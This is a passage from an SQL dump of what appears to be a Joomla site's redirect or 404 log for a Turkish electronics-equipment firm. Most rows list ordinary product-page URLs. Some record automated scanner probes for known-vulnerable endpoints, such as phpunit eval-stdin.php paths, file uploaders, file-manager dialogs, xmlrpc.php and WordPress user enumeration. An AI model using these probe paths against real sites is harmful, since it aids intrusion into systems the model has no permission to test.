08:10:39','0000-00-00 00:00:00',301),(23156,'https://3s-technologies.com.tr/tr/api',NULL,'','',1,0,'2019-08-21 08:10:39','0000-00-00 00:00:00',301),(23157,'https://3s-technologies.com.tr/tr/swagger/index.html',NULL,'','',1,0,'2019-08-21 08:10:40','0000-00-00 00:00:00',301),(23158,'https://3s-technologies.com.tr/tr/dana-na/auth/url_default/welcome.cgi',NULL,'','',1,0,'2019-08-21 08:10:41','0000-00-00 00:00:00',301),(23159,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturers/ddm-novastar',NULL,'','',3,0,'2019-08-24 06:38:24','0000-00-00 00:00:00',301),(23160,'http://3s-technologies.com.tr/en/theme/assets/global/plugins/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/theme/assets/global/plugins/jquery-file-upload/server/php/','',1,0,'2019-08-24 14:38:17','0000-00-00 00:00:00',301),(23161,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/anasayfa2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',10,0,'2019-08-24 16:30:21','0000-00-00 00:00:00',301),(23162,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/275-k100-1.2mm-detail?tmpl=component&print=1',NULL,'','',2,0,'2019-08-24 19:02:46','0000-00-00 00:00:00',301),(23163,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2019-08-24 19:35:19','0000-00-00 00:00:00',301),(23164,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name/dirdesc?language=tr-tr',NULL,'','',3,0,'2019-08-24 20:59:40','0000-00-00 00:00:00',301),(23165,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/dirdesc/results,1-10',NULL,'','',2,0,'2019-08-24 22:41:44','0000-00-00 00:00:00',301),(23166,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/results,1-10?language=tr-tr',NULL,'','',3,0,'2019-08-24 23:10:42','0000-00-00 00:00:00',301),(23167,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',3,0,'2019-08-24 23:42:17','0000-00-00 00:00:00',301),(23168,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-20',NULL,'','',2,0,'2019-08-25 01:04:31','0000-00-00 00:00:00',301),(23169,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&itemid=153&lang=tr',NULL,'','',3,0,'2019-08-25 03:00:47','0000-00-00 00:00:00',301),(23170,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc/results,1-100?language=tr-tr',NULL,'','',3,0,'2019-08-25 03:08:42','0000-00-00 00:00:00',301),(23171,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_sku/results,1-40',NULL,'','',3,0,'2019-08-25 07:51:43','0000-00-00 00:00:00',301),(23172,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/dirdesc?language=tr-tr',NULL,'','',2,0,'2019-08-25 08:36:23','0000-00-00 00:00:00',301),(23173,'http://www.3s-technologies.com.tr/tr/qgahptbx.html',NULL,'','',1,0,'2019-08-25 14:28:29','0000-00-00 00:00:00',301),(23174,'http://3s-technologies.com.tr/tr/?option=com_facileforms&tmpl=component',NULL,'','',1,0,'2019-08-25 19:20:47','0000-00-00 00:00:00',301),(23175,'http://3s-technologies.com.tr/tr/?option=com_chronocontact&tmpl=component',NULL,'','',1,0,'2019-08-25 19:20:48','0000-00-00 00:00:00',301),(23176,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,ordering?language=tr-tr',NULL,'','',4,0,'2019-08-26 05:33:40','0000-00-00 00:00:00',301),(23177,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name',NULL,'','',10,0,'2019-08-26 15:59:06','0000-00-00 00:00:00',301),(23178,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/results,1-50?language=tr-tr',NULL,'','',2,0,'2019-08-26 18:59:44','0000-00-00 00:00:00',301),(23179,'http://3s-technologies.com.tr/tr/tmp/uploader.php',NULL,'','',1,0,'2019-08-26 21:14:13','0000-00-00 00:00:00',301),(23180,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/2.-el-makineler/avb-detail',NULL,'','',3,0,'2019-08-27 00:20:15','0000-00-00 00:00:00',301),(23181,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/dalga-lehim/by,ordering?language=tr-tr',NULL,'','',4,0,'2019-08-27 06:13:44','0000-00-00 00:00:00',301),(23182,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/results,1-5?language=tr-tr&filter_product=',NULL,'','',3,0,'2019-08-27 06:14:31','0000-00-00 00:00:00',301),(23183,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name/results,1-50?language=tr-tr',NULL,'','',3,0,'2019-08-27 08:22:55','0000-00-00 00:00:00',301),(23184,'http://3s-technologies.com.tr/tr/wresxdrdpim.html',NULL,'','',1,0,'2019-08-27 09:54:05','0000-00-00 00:00:00',301),(23185,'http://3s-technologies.com.tr/plugins/editors-xtd/terrible_api.php',NULL,'','',1,0,'2019-08-27 10:10:18','0000-00-00 00:00:00',301),(23186,'http://3s-technologies.com.tr/en/cde42170f4f5b29105ed3977c1f5f4d1.php',NULL,'http://3s-technologies.com.tr/cde42170f4f5b29105ed3977c1f5f4d1.php','',2,0,'2019-08-27 17:18:12','0000-00-00 00:00:00',301),(23187,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/screen-printer/spr-20-41-42-detail',NULL,'','',3,0,'2019-08-27 21:46:56','0000-00-00 00:00:00',301),(23188,'http://3s-technologies.com.tr/tr/templates/system/akismet.php',NULL,'','',1,0,'2019-08-27 22:08:53','0000-00-00 00:00:00',301),(23189,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',5,0,'2019-08-28 04:49:14','0000-00-00 00:00:00',301),(23190,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',5,0,'2019-08-28 05:25:41','0000-00-00 00:00:00',301),(23191,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-40',NULL,'','',5,0,'2019-08-28 16:36:21','0000-00-00 00:00:00',301),(23192,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',4,0,'2019-08-28 17:08:14','0000-00-00 00:00:00',301),(23193,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name?language=tr-tr',NULL,'','',4,0,'2019-08-29 01:03:49','0000-00-00 00:00:00',301),(23194,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/flux',NULL,'','',4,0,'2019-08-29 02:13:00','0000-00-00 00:00:00',301),(23195,'http://3s-technologies.com.tr/tr/?option=com_content&view=article&layout=form',NULL,'','',4,0,'2019-08-29 13:00:27','0000-00-00 00:00:00',301),(23196,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',3,0,'2019-08-29 17:07:45','0000-00-00 00:00:00',301),(23197,'http://3s-technologies.com.tr/tr/phpthumb.libs.php',NULL,'','',1,0,'2019-08-29 22:29:21','0000-00-00 00:00:00',301),(23198,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,mf_name/results,1-50?language=tr-tr',NULL,'','',3,0,'2019-08-30 21:24:33','0000-00-00 00:00:00',301),(23199,'http://3s-technologies.com.tr/tr/components/com_komento/assets/css/common.css',NULL,'','',4,0,'2019-09-01 14:10:11','0000-00-00 00:00:00',301),(23200,'http://www.3s-technologies.com.tr/tr/dhnlhhlugy.html',NULL,'','',1,0,'2019-09-02 18:14:45','0000-00-00 00:00:00',301),(23201,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/op.php',NULL,'http://3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/op.php','',1,0,'2019-09-03 09:21:56','0000-00-00 00:00:00',301),(23202,'http://3s-technologies.com.tr/tr/templates/system/css/system.css',NULL,'','',1,0,'2019-09-03 12:53:34','0000-00-00 00:00:00',301),(23203,'http://3s-technologies.com.tr/tr/vdtkrobnntvvppoq.html',NULL,'','',2,0,'2019-09-03 20:16:06','0000-00-00 00:00:00',301),(23204,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,1-50',NULL,'','',2,0,'2019-09-03 21:18:46','0000-00-00 00:00:00',301),(23205,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/composer.json',NULL,'','',3,0,'2019-09-04 05:41:25','0000-00-00 00:00:00',301),(23206,'http://3s-technologies.com.tr/tr/repair.php',NULL,'http://3s-technologies.com.tr/tr/repair.php','',12,0,'2019-09-04 14:19:27','0000-00-00 00:00:00',301),(23207,'http://3s-technologies.com.tr/en/repair.php',NULL,'http://3s-technologies.com.tr/repair.php','',1,0,'2019-09-04 17:58:19','0000-00-00 00:00:00',301),(23208,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/dirdesc/results,1-50?language=tr-tr&filter_product=',NULL,'','',1,0,'2019-09-05 01:29:44','0000-00-00 00:00:00',301),(23209,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc/results,1-100?language=tr-tr',NULL,'','',1,0,'2019-09-05 03:55:11','0000-00-00 00:00:00',301),(23210,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name/results,1-50',NULL,'','',2,0,'2019-09-05 07:07:54','0000-00-00 00:00:00',301),(23211,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/dirdesc/results,1-50?language=tr-tr',NULL,'','',1,0,'2019-09-05 10:13:21','0000-00-00 00:00:00',301),(23212,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/dirdesc',NULL,'','',8,0,'2019-09-05 18:16:58','0000-00-00 00:00:00',301),(23213,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/dalga-lehim/results,1-5?language=tr-tr',NULL,'','',1,0,'2019-09-05 22:09:41','0000-00-00 00:00:00',301),(23214,'http://3s-technologies.com.tr/tr/wtx.cfm',NULL,'','',1,0,'2019-09-05 23:18:09','0000-00-00 00:00:00',301),(23215,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/dalga-lehim/by,mf_name/results,1-20',NULL,'','',1,0,'2019-09-06 04:46:02','0000-00-00 00:00:00',301),(23216,'http://3s-technologies.com.tr/tr/wp-includes',NULL,'','',136,0,'2019-09-06 13:18:09','0000-00-00 00:00:00',301),(23217,'http://www.3s-technologies.com.tr/en/register.php',NULL,'http://www.3s-technologies.com.tr','',3,0,'2019-09-09 02:03:05','0000-00-00 00:00:00',301),(23218,'http://www.3s-technologies.com.tr/en/register.php',NULL,'http://www.3s-technologies.com.tr','',1,0,'2019-09-09 02:03:05','0000-00-00 00:00:00',301),(23219,'http://3s-technologies.com.tr/tr/administrator/config.php',NULL,'3s-technologies.com.tr','',1,0,'2019-09-10 08:31:27','0000-00-00 00:00:00',301),(23220,'http://www.3s-technologies.com.tr/tr/ijgjdkzdfhki.html',NULL,'','',1,0,'2019-09-10 19:49:23','0000-00-00 00:00:00',301),(23221,'http://3s-technologies.com.tr/administrator/components/com_cache/models/exceptions.php',NULL,'','',1,0,'2019-09-10 23:42:45','0000-00-00 00:00:00',301),(23222,'http://3s-technologies.com.tr/tr/libraries/joomla/access/rule.php',NULL,'','',1,0,'2019-09-11 00:18:30','0000-00-00 00:00:00',301),(23223,'http://3s-technologies.com.tr/en/catalog/view/javascript/common.js',NULL,'','',1,0,'2019-09-11 04:04:24','0000-00-00 00:00:00',301),(23224,'http://www.3s-technologies.com.tr/index.php?view=article&id=72&itemid=78&lang=tr&option=com_content2121121121212.1',NULL,'','',3,0,'2019-09-11 07:55:47','0000-00-00 00:00:00',301),(23225,'http://www.3s-technologies.com.tr/index.php?option=com_content&id=72&itemid=78&lang=tr&view=article2121121121212.1',NULL,'','',3,0,'2019-09-11 07:55:48','0000-00-00 00:00:00',301),(23226,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&itemid=78&lang=tr&id=722121121121212.1',NULL,'','',3,0,'2019-09-11 07:55:49','0000-00-00 00:00:00',301),(23227,'http://3s-technologies.com.tr/en/filemanager/dialog.php',NULL,'','',8,0,'2019-09-11 16:52:03','0000-00-00 00:00:00',301),(23228,'http://3s-technologies.com.tr/tr/dkeunlcnipazire.html',NULL,'','',1,0,'2019-09-11 19:39:49','0000-00-00 00:00:00',301),(23229,'https://3s-technologies.com.tr/tr/images/pdf/le_benchtop_automated_pick-place.pdf',NULL,'','',4,0,'2019-09-14 08:23:47','0000-00-00 00:00:00',301),(23230,'http://www.3s-technologies.com.tr/tr/administrator/images/logo/logo-3s.jpg',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_virtuemart&view=manufacturer','',2,0,'2019-09-16 09:07:55','0000-00-00 00:00:00',301),(23231,'http://www.3s-technologies.com.tr/tr/ana-sayfa/tp=1',NULL,'','',1,0,'2019-09-16 09:34:51','0000-00-00 00:00:00',301),(23232,'http://www.3s-technologies.com.tr/tr/components/com_jce/editor/libraries/fonts/fontawesome-webfont.woff2',NULL,'http://www.3s-technologies.com.tr/components/com_jce/editor/libraries/uikit/uikit.min.css','',8,0,'2019-09-16 10:40:50','0000-00-00 00:00:00',301),(23233,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',12,0,'2019-09-16 14:47:33','0000-00-00 00:00:00',301),(23234,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-milling',NULL,'','',2,0,'2019-09-16 15:41:00','0000-00-00 00:00:00',301),(23235,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-kazıma-milling',NULL,'','',1,0,'2019-09-16 15:48:49','0000-00-00 00:00:00',301),(23236,'http://www.3s-technologies.com.tr/tr/images/cnc/video/pcb-holes.mp4',NULL,'http://www.3s-technologies.com.tr/tr/pcb-delikler-holes','',2,0,'2019-09-16 16:09:28','0000-00-00 00:00:00',301),(23237,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',17,0,'2019-09-16 23:22:04','0000-00-00 00:00:00',301),(23238,'http://3s-technologies.com.tr/tr/using-joomla/extensions/modules/utility-modules/syndicate',NULL,'','',11,0,'2019-09-17 08:00:55','0000-00-00 00:00:00',301),(23239,'http://www.3s-technologies.com.tr/en/image-gallery/scenery/34-pinnacles',NULL,'','',16,0,'2019-09-17 09:30:08','0000-00-00 00:00:00',301),(23240,'http://www.3s-technologies.com.tr/tr/pcb-non-copper',NULL,'http://www.3s-technologies.com.tr/tr/pcb-kaz%C4%B1ma-milling','',22,0,'2019-09-17 10:24:02','0000-00-00 00:00:00',301),(23241,'http://www.3s-technologies.com.tr/en/video',NULL,'http://www.3s-technologies.com.tr/tr/video','',1,0,'2019-09-17 10:32:48','0000-00-00 00:00:00',301),(23242,'http://www.3s-technologies.com.tr/tr/video/pcb-seviyeleme',NULL,'http://www.3s-technologies.com.tr/tr/video/pcb-seviyeleme','',1,0,'2019-09-17 10:35:08','0000-00-00 00:00:00',301),(23243,'http://www.3s-technologies.com.tr/tr/t',NULL,'','',1,0,'2019-09-17 10:35:13','0000-00-00 00:00:00',301),(23244,'http://www.3s-technologies.com.tr/tr/pcb-milling',NULL,'http://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping','',23,0,'2019-09-17 10:40:20','0000-00-00 00:00:00',301),(23245,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping',NULL,'','',125,0,'2019-09-17 11:33:53','0000-00-00 00:00:00',301),(23246,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=45&itemid=29&lang=en',NULL,'','',1,0,'2019-09-17 11:40:57','0000-00-00 00:00:00',301),(23247,'http://www.3s-technologies.com.tr/en/image-gallery/scenery/64-blue-mountain-rain-forest',NULL,'','',19,0,'2019-09-17 13:14:10','0000-00-00 00:00:00',301),(23248,'http://www.3s-technologies.com.tr/en/pcb-prototip-prototyping',NULL,'','',453,0,'2019-09-17 13:44:47','0000-00-00 00:00:00',301),(23249,'http://www.3s-technologies.com.tr/tr/hkevrkeomo.html',NULL,'','',1,0,'2019-09-17 18:58:12','0000-00-00 00:00:00',301),(23250,'http://www.3s-technologies.com.tr/tr/pcb-delikler-holes',NULL,'','',18,0,'2019-09-17 22:35:23','0000-00-00 00:00:00',301),(23251,'http://3s-technologies.com.tr/tr/pcb-non-copper',NULL,'','',8,0,'2019-09-18 01:49:11','0000-00-00 00:00:00',301),(23252,'http://3s-technologies.com.tr/tr/pcb-outline',NULL,'','',8,0,'2019-09-18 05:07:12','0000-00-00 00:00:00',301),(23253,'http://www.3s-technologies.com.tr/en/parks-home',NULL,'','',12,0,'2019-09-18 07:08:22','0000-00-00 00:00:00',301),(23254,'http://3s-technologies.com.tr/en//wp-json/wp/v2/users/',NULL,'','',1,0,'2019-09-18 08:36:04','0000-00-00 00:00:00',301),(23255,'http://3s-technologies.com.tr/en//xmlrpc.php',NULL,'','',88,0,'2019-09-18 08:36:04','0000-00-00 00:00:00',301),(23256,'http://3s-technologies.com.tr/en/pcb-kazıma-milling',NULL,'','',8,0,'2019-09-18 11:00:25','0000-00-00 00:00:00',301),(23257,'http://www.3s-technologies.com.tr/tr/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2019-09-18 13:33:38','0000-00-00 00:00:00',301),(23258,'http://www.3s-technologies.com.tr/tr/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2019-09-18 13:33:45','0000-00-00 00:00:00',301),(23259,'http://www.3s-technologies.com.tr/tr/wp/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2019-09-18 13:33:46','0000-00-00 00:00:00',301),(23260,'http://www.3s-technologies.com.tr/tr/old/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2019-09-18 13:33:50','0000-00-00 00:00:00',301),(23261,'http://www.3s-technologies.com.tr/tr/lib/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2019-09-18 13:33:58','0000-00-00 00:00:00',301),(23262,'https://3s-technologies.com.tr/tr/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2019-09-18 13:34:47','0000-00-00 00:00:00',301),(23263,'https://3s-technologies.com.tr/tr/phpunit/src/util/php/eval-stdin.php',NULL,'','',1,0,'2019-09-18 13:34:56','0000-00-00 00:00:00',301),(23264,'http://www.3s-technologies.com.tr/tr/bitrix/admin',NULL,'http://www.3s-technologies.com.tr/bitrix/admin/','',2,0,'2019-09-18 14:11:10','0000-00-00 00:00:00',301),(23265,'http://mail.3s-technologies.com.tr/tr/admin',NULL,'http://mail.3s-technologies.com.tr/admin/','',14,0,'2019-09-18 14:36:59','0000-00-00 00:00:00',301),(23266,'http://mail.3s-technologies.com.tr/tr/downloader',NULL,'http://mail.3s-technologies.com.tr/downloader/','',1,0,'2019-09-18 14:37:00','0000-00-00 00:00:00',301),(23267,'http://mail.3s-technologies.com.tr/tr/rss/catalog/notifystock',NULL,'http://mail.3s-technologies.com.tr/rss/catalog/notifystock/','',1,0,'2019-09-18 14:37:00','0000-00-00 00:00:00',301),(23268,'http://mail.3s-technologies.com.tr/tr/rss/order/new',NULL,'http://mail.3s-technologies.com.tr/rss/order/new/','',1,0,'2019-09-18 14:37:00','0000-00-00 00:00:00',301),(23269,'http://mail.3s-technologies.com.tr/tr/user/login',NULL,'http://mail.3s-technologies.com.tr/user/login','',1,0,'2019-09-18 15:16:02','0000-00-00 00:00:00',301),(23270,'http://mail.3s-technologies.com.tr/tr/bitrix/admin',NULL,'http://mail.3s-technologies.com.tr/bitrix/admin/','',2,0,'2019-09-18 15:24:32','0000-00-00 00:00:00',301),(23271,'http://www.3s-technologies.com.tr/en/park-blog',NULL,'','',63,0,'2019-09-18 17:20:35','0000-00-00 00:00:00',301),(23272,'http://www.3s-technologies.com.tr/tr/welcome',NULL,'','',18,0,'2019-09-18 18:24:36','0000-00-00 00:00:00',301),(23273,'http://3s-technologies.com.tr/tr/cjhlamxf.html',NULL,'','',1,0,'2019-09-18 18:43:05','0000-00-00 00:00:00',301),(23274,'http://3s-technologies.com.tr/en/pcb-yükseklik-self-levelling',NULL,'','',8,0,'2019-09-18 19:55:22','0000-00-00 00:00:00',301),(23275,'http://3s-technologies.com.tr/tr/pcb-yükseklik-self-levelling',NULL,'','',8,0,'2019-09-18 19:55:25','0000-00-00 00:00:00',301),(23276,'http://www.3s-technologies.com.tr/tr/videolar',NULL,'','',19,0,'2019-09-18 20:49:20','0000-00-00 00:00:00',301),(23277,'https://3s-technologies.com.tr/tr/pcb-kazıma-milling',NULL,'','',5,0,'2019-09-18 21:38:54','0000-00-00 00:00:00',301),(23278,'http://3s-technologies.com.tr/tr/login',NULL,'','',58,0,'2019-09-18 22:30:12','0000-00-00 00:00:00',301),(23279,'http://3s-technologies.com.tr/tr/login.php',NULL,'','',55,0,'2019-09-18 22:30:12','0000-00-00 00:00:00',301),(23280,'http://www.3s-technologies.com.tr/tr/growers',NULL,'','',66,0,'2019-09-19 01:09:43','0000-00-00 00:00:00',301),(23281,'http://mail.3s-technologies.com.tr/tr/pcb-milling',NULL,'','',2,0,'2019-09-19 03:07:11','0000-00-00 00:00:00',301),(23282,'https://mail.3s-technologies.com.tr/tr/videolar',NULL,'','',2,0,'2019-09-19 03:12:09','0000-00-00 00:00:00',301),(23283,'http://3s-technologies.com.tr/en/pcb-prototip-prototyping',NULL,'','',284,0,'2019-09-19 03:36:05','0000-00-00 00:00:00',301),(23284,'https://3s-technologies.com.tr/tr/pcb-yükseklik-self-levelling',NULL,'','',4,0,'2019-09-19 03:51:10','0000-00-00 00:00:00',301),(23285,'https://3s-technologies.com.tr/tr/pcb-milling',NULL,'','',4,0,'2019-09-19 04:06:59','0000-00-00 00:00:00',301),(23286,'http://mail.3s-technologies.com.tr/en/pcb-yükseklik-self-levelling',NULL,'','',2,0,'2019-09-19 04:11:49','0000-00-00 00:00:00',301),(23287,'http://mail.3s-technologies.com.tr/en/pcb-prototip-prototyping',NULL,'','',4,0,'2019-09-19 04:40:47','0000-00-00 00:00:00',301),(23288,'https://3s-technologies.com.tr/tr/pcb-delikler-holes',NULL,'','',6,0,'2019-09-19 04:57:20','0000-00-00 00:00:00',301),(23289,'https://3s-technologies.com.tr/tr/videolar',NULL,'','',3,0,'2019-09-19 05:16:39','0000-00-00 00:00:00',301),(23290,'https://3s-technologies.com.tr/tr/pcb-non-copper',NULL,'','',4,0,'2019-09-19 06:17:52','0000-00-00 00:00:00',301),(23291,'http://3s-technologies.com.tr/tr/videolar',NULL,'','',9,0,'2019-09-19 06:19:56','0000-00-00 00:00:00',301),(23292,'http://3s-technologies.com.tr/en/pcb-delikler-holes',NULL,'','',8,0,'2019-09-19 06:21:11','0000-00-00 00:00:00',301),(23293,'https://3s-technologies.com.tr/tr/pcb-outline',NULL,'','',3,0,'2019-09-19 06:44:50','0000-00-00 00:00:00',301),(23294,'http://3s-technologies.com.tr/en/pcb-non-copper',NULL,'','',7,0,'2019-09-19 06:46:24','0000-00-00 00:00:00',301),(23295,'https://www.3s-technologies.com.tr/en/pcb-kazıma-milling',NULL,'','',6,0,'2019-09-19 06:57:38','0000-00-00 00:00:00',301),(23296,'http://www.3s-technologies.com.tr/tr/pcb-kazıma-milling',NULL,'','',15,0,'2019-09-19 07:48:31','0000-00-00 00:00:00',301),(23297,'http://3s-technologies.com.tr/tr/pcb-kazıma-milling',NULL,'','',7,0,'2019-09-19 08:07:13','0000-00-00 00:00:00',301),(23298,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/park-blog?format=feed&type=rss',NULL,'','',1,0,'2019-09-19 08:43:47','0000-00-00 00:00:00',301),(23299,'http://www.3s-technologies.com.tr/en/pcb-kazıma-milling',NULL,'','',9,0,'2019-09-19 09:09:13','0000-00-00 00:00:00',301),(23300,'https://www.3s-technologies.com.tr/en/pcb-prototip-prototyping',NULL,'','',253,0,'2019-09-19 09:36:54','0000-00-00 00:00:00',301),(23301,'https://3s-technologies.com.tr/en/pcb-non-copper',NULL,'','',5,0,'2019-09-19 09:41:17','0000-00-00 00:00:00',301),(23302,'http://www.3s-technologies.com.tr/index.php/tr/welcome',NULL,'','',10,0,'2019-09-19 09:49:10','0000-00-00 00:00:00',301),(23303,'https://mail.3s-technologies.com.tr/tr/pcb-delikler-holes',NULL,'','',2,0,'2019-09-19 10:17:36','0000-00-00 00:00:00',301),(23304,'https://3s-technologies.com.tr/en/pcb-outline',NULL,'','',1,0,'2019-09-19 11:10:13','0000-00-00 00:00:00',301),(23305,'http://www.3s-technologies.com.tr/tr/pcb-outline',NULL,'','',18,0,'2019-09-19 11:13:42','0000-00-00 00:00:00',301),(23306,'http://3s-technologies.com.tr/en/pcb-outline',NULL,'','',8,0,'2019-09-19 11:35:34','0000-00-00 00:00:00',301),(23307,'http://mail.3s-technologies.com.tr/en/pcb-non-copper',NULL,'','',2,0,'2019-09-19 11:37:52','0000-00-00 00:00:00',301),(23308,'https://3s-technologies.com.tr/en/pcb-yükseklik-self-levelling',NULL,'','',2,0,'2019-09-19 11:55:59','0000-00-00 00:00:00',301),(23309,'https://3s-technologies.com.tr/en/pcb-delikler-holes',NULL,'','',2,0,'2019-09-19 11:56:17','0000-00-00 00:00:00',301),(23310,'http://www.3s-technologies.com.tr/en/pcb-non-copper',NULL,'','',10,0,'2019-09-19 11:56:56','0000-00-00 00:00:00',301),(23311,'https://www.3s-technologies.com.tr/en/pcb-non-copper',NULL,'','',6,0,'2019-09-19 12:36:46','0000-00-00 00:00:00',301),(23312,'https://mail.3s-technologies.com.tr/en/pcb-delikler-holes',NULL,'','',2,0,'2019-09-19 12:42:45','0000-00-00 00:00:00',301),(23313,'https://mail.3s-technologies.com.tr/tr/pcb-milling',NULL,'','',2,0,'2019-09-19 12:58:30','0000-00-00 00:00:00',301),(23314,'http://www.3s-technologies.com.tr/en/image-gallery/animals?format=feed&type=atom',NULL,'','',1,0,'2019-09-19 13:06:53','0000-00-00 00:00:00',301),(23315,'https://3s-technologies.com.tr/en/pcb-kazıma-milling',NULL,'','',2,0,'2019-09-19 13:29:01','0000-00-00 00:00:00',301),(23316,'http://mail.3s-technologies.com.tr/en/pcb-delikler-holes',NULL,'','',2,0,'2019-09-19 13:58:56','0000-00-00 00:00:00',301),(23317,'https://www.3s-technologies.com.tr/tr/pcb-yükseklik-self-levelling',NULL,'','',7,0,'2019-09-19 14:48:51','0000-00-00 00:00:00',301),(23318,'https://www.3s-technologies.com.tr/en/pcb-yükseklik-self-levelling',NULL,'','',8,0,'2019-09-19 15:03:14','0000-00-00 00:00:00',301),(23319,'https://mail.3s-technologies.com.tr/en/pcb-outline',NULL,'','',2,0,'2019-09-19 15:45:22','0000-00-00 00:00:00',301),(23320,'http://www.3s-technologies.com.tr/en/pcb-delikler-holes',NULL,'','',11,0,'2019-09-19 15:57:04','0000-00-00 00:00:00',301),(23321,'http://www.3s-technologies.com.tr/en/pcb-outline',NULL,'','',10,0,'2019-09-19 16:08:17','0000-00-00 00:00:00',301),(23322,'http://mail.3s-technologies.com.tr/tr/pcb-kazıma-milling',NULL,'','',2,0,'2019-09-19 16:32:17','0000-00-00 00:00:00',301),(23323,'https://www.3s-technologies.com.tr/tr/pcb-non-copper',NULL,'','',7,0,'2019-09-19 17:29:42','0000-00-00 00:00:00',301),(23324,'https://mail.3s-technologies.com.tr/en/pcb-kazıma-milling',NULL,'','',2,0,'2019-09-19 17:41:05','0000-00-00 00:00:00',301),(23325,'http://3s-technologies.com.tr/tr/pcb-milling',NULL,'','',9,0,'2019-09-19 17:55:28','0000-00-00 00:00:00',301),(23326,'https://mail.3s-technologies.com.tr/en/pcb-non-copper',NULL,'','',2,0,'2019-09-19 17:57:44','0000-00-00 